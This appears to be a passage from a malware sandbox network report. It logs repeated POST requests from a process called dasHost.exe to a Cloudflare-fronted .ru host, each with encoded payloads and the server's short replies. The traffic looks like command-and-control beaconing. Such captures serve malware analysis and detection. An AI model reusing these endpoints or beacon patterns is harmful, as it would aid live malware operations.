                                                                        Dec 28, 2024 20:43:01.244499922 CET804INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:01 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DtFHkn4sWUoW83VbycqWPRN6A9wiQpieRcNld4H3nJ7zjkWT2JMIYZcd3DPvnXPW8fMY6z2duPfDNB8BYT2SwKKu%2Fq85ND0tMqJUchLCTa5HDyX9F5T1uOZbIe7hh%2F%2FX3mFdlgSS"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94096e484a4233-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4440&min_rtt=1721&rtt_var=6084&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=62193&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.449753104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:01.559376955 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:01.907310963 CET2584OUTData Raw: 53 50 59 51 56 49 50 52 5d 5f 52 56 5a 5e 58 5e 57 5c 5f 5b 54 5c 55 42 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SPYQVIPR]_RVZ^X^W\_[T\UBR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$X(,[!+75<[,+7[ -9>>;7:4*/.X"V3),%\ ![(?
                                                                        Dec 28, 2024 20:43:02.737859011 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:02.993202925 CET808INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:02 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=01muZ33fnA7k3WJLIX2UBZJAlJTyzFUib%2Bo%2B6Rl2pReEqRO0cVQt2%2FTK%2B3MB9sG5FPrlrm%2Bg3ySEaXQGBG9MtKTz1YADZM93Y3kSLwb33wZcjDg4XRgC5hU6BVGkKIAsg4CtrQNK"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94097918ff80d9-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3278&min_rtt=1507&rtt_var=4108&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=93112&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.449755104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:03.277700901 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:03.626080990 CET2584OUTData Raw: 53 56 59 5f 56 49 55 5e 5d 5f 52 56 5a 5f 58 54 57 5f 5f 59 54 50 55 46 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SVY_VIU^]_RVZ_XTW__YTPUFR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y)<&"+"%^;$#X2+= )>3[-93X50((<%\ ![(
                                                                        Dec 28, 2024 20:43:04.361829042 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:04.608669996 CET808INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:04 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2FIP%2B3miw%2BEX3Es6LepBifQfAo8s5FzX36wZe2Z8QpAUd9A0DW1kOrjXNmvMgIo6AqcRTzhIHid%2BAdv4S%2Fz8yWCMDP9ar44wDa%2BVWCyDHAs6K9MWJAdRCnRxWYU5Ym7xS33uJpUD"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94098359ca80dc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4186&min_rtt=1706&rtt_var=5601&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=67743&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0
                                                                        Dec 28, 2024 20:43:05.117187977 CET808INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:04 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2FIP%2B3miw%2BEX3Es6LepBifQfAo8s5FzX36wZe2Z8QpAUd9A0DW1kOrjXNmvMgIo6AqcRTzhIHid%2BAdv4S%2Fz8yWCMDP9ar44wDa%2BVWCyDHAs6K9MWJAdRCnRxWYU5Ym7xS33uJpUD"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94098359ca80dc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4186&min_rtt=1706&rtt_var=5601&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=67743&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.449756104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:05.410176992 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:05.766735077 CET2580OUTData Raw: 53 50 5c 52 56 40 50 58 5d 5f 52 56 5a 58 58 54 57 5e 5f 5d 54 57 55 45 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SP\RV@PX]_RVZXXTW^_]TWUER]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$[<<!]"; %,Z-+ #.&Y).3 )+>?$.:?\"##=<%\ ![(
                                                                        Dec 28, 2024 20:43:06.497085094 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:06.741935015 CET805INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aQC3ir3ARCvYVlr%2BRa3dRXcRuvEoNptWzXdvX1h2x7XSwBM8PpETNP0EReg3ZniKeRg%2Bw9UBot4Bn0bz0o8xspNdBtZ5xu61ntjR2%2FfMopJRQID3DndLV8p0GU5WQLsF2t5deYwB"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940990ac3ec34d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6657&min_rtt=1558&rtt_var=10782&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=34474&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.449762104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:07.010354996 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:07.360524893 CET2584OUTData Raw: 56 53 59 53 53 46 50 53 5d 5f 52 56 5a 50 58 5a 57 5b 5f 5c 54 50 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VSYSSFPS]_RVZPXZW[_\TPU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$(/:68' 5(/] !>2Y>$ )/Q=,,.9'!V')%\ ![(
                                                                        Dec 28, 2024 20:43:08.142354012 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:08.384448051 CET803INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:08 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BMnILoFhEj958AUHBLK9mjjJDMLPyiaaXUWZsvwSrOcH6J3E6n1iUhfKAnVxqBhvG%2BtnU2MYzUpXBcxCVfvVFezZB7j8AD3JSd92ioFrBJkh6h4MDRReUh5ML9VV2TZ4rCDVpz76"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94099aefd041f3-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9977&min_rtt=2254&rtt_var=16291&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=22798&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.449766104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:08.631288052 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:08.985441923 CET2584OUTData Raw: 56 5b 5c 52 56 44 50 5e 5d 5f 52 56 5a 5b 58 5e 57 58 5f 5d 54 57 55 42 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: V[\RVDP^]_RVZ[X^WX_]TWUBR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX')/-]!(8 6?8+4#--+>, 9'U)/'[9'63 *%\ ![(+
                                                                        Dec 28, 2024 20:43:09.716850042 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:09.955317020 CET819INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:09 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=10o82qO2e%2BvO0NAbbTDWtaFAuS%2FFQwIbSNwrL9Nu93uC7uZ%2BYMHzkfg6Rw7DX4oX%2FUhK0UEcY9aJZdl1tK4SsChd%2F%2FgoKBJLPqsBxqftY5QVitNIo4Wq%2FZ5Sha0Z%2FN2M%2FCRk%2FJQH"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409a4cfc443f9-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=7317&min_rtt=2192&rtt_var=11072&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=33800&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.449769104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:10.198853970 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:10.548271894 CET2584OUTData Raw: 56 51 5c 53 56 45 55 58 5d 5f 52 56 5a 50 58 59 57 5b 5f 5f 54 50 55 41 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VQ\SVEUX]_RVZPXYW[__TPUAR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'<,)Z!88"&;-+0#=2]>=P )?^9860;*%\ ![(
                                                                        Dec 28, 2024 20:43:11.283055067 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:11.534069061 CET804INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:11 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7hxgXC%2BKGNcoSPaVP4YPuEOiZG8bn2O8w6TkH9WORCGUgGXosRC08ktq7DXNljPOdZS8E1kK%2FV1Y1d6YWhOqaPPdq9pbRXT9HUXDdHwxp0i0JaWUIQv3hmS67iL6eVF%2Fhi9Za1NQ"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409ae9f590cc6-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4248&min_rtt=1550&rtt_var=5979&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=63091&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.449775104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:11.777249098 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:12.126060009 CET2584OUTData Raw: 56 56 59 50 56 44 55 5c 5d 5f 52 56 5a 59 58 5f 57 5d 5f 51 54 53 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VVYPVDU\]_RVZYX_W]_QTSUHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$^+,9";4S Z-+!>%=>?T4/W(?<-35#(,%\ ![(#
                                                                        Dec 28, 2024 20:43:12.953546047 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:13.241085052 CET806INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:13 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1QGTG2uyjOPJs27TDlePVfDKrM16NjEdEzyRJgndIfpMSJnl3e812xelobFe2GX3of6S%2F8ur%2Fa%2BtTKnQurXZOSOZPmHIXmXrqZqAK1dc7akMAkaMMErvaMKsUAFMAYn%2F6tNKhUge"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409b8faf86a5e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3836&min_rtt=1764&rtt_var=4806&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=79594&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.449781104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:13.515544891 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:13.860470057 CET2584OUTData Raw: 56 57 5c 53 53 42 50 58 5d 5f 52 56 5a 5d 58 58 57 5c 5f 5b 54 50 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VW\SSBPX]_RVZ]XXW\_[TPU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$[<<_!8+#5Y/(+4>1+-$#:4=?+^-)6 >%\ ![(3
                                                                        Dec 28, 2024 20:43:14.646616936 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:14.887959003 CET807INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:14 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rAN2SB2IedNJrrypGZXibJrM0c2LxBNvg%2F%2FIGNiJuBDPqDy5%2BIvpD%2BJvmHTeAp5qzyMP360nGl5baDI4ghG6Ic5MonGbT4A5TrcOabzz4jFJN6ax8rpXHA3s6HS4PsNQxCJMYLsg"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409c39c9d17a9-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=7750&min_rtt=1572&rtt_var=12945&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=28629&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.449783104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:15.230312109 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:15.579382896 CET2584OUTData Raw: 53 50 5c 54 53 41 50 5f 5d 5f 52 56 5a 59 58 55 57 5f 5f 5a 54 5d 55 45 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SP\TSAP_]_RVZYXUW__ZT]UER]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$?&!+,[4/(+ >!==+V4_7Q=,'::#Y50>%\ ![(#
                                                                        Dec 28, 2024 20:43:16.407732964 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:16.662080050 CET804INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:16 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2895amsfseQAJllQCPboMmiYYJltMPcj0DcTIgQBS3HtuWwllF6AIqX6s8o%2F8SLyGAiH8H1AtH%2FKXpM3Rc2b7gN0X6EFJK4duXT7MxtCGZCUPrQxz5m6AEafQqr3TMPw1X9%2F6mPr"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409ce8e8a4340-EWR
                                                                        alt-svc: h3=":443"; ma=86400
